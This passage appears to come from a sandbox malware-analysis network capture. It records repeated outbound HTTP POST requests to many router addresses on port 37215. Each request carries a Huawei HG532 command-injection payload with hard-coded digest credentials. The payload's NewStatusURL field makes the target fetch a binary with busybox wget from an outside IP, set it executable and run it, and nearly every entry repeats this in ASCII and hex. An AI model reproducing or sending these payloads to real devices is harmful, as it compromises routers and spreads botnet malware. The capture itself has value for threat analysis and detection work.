2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            449192.168.2.1550586197.101.157.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783935070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            450192.168.2.1539130197.206.117.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783963919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            451192.168.2.1557324197.70.42.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784004927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            452192.168.2.1543100197.51.207.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784014940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            453192.168.2.1552236197.147.14.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784041882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            454192.168.2.1557160197.190.81.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784068108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            455192.168.2.1537180197.182.129.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784097910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            456192.168.2.1535146197.28.5.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784116030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            457192.168.2.1548816197.249.200.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784145117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            458192.168.2.1555434197.8.160.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784164906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            459192.168.2.1542332197.35.223.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784188986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
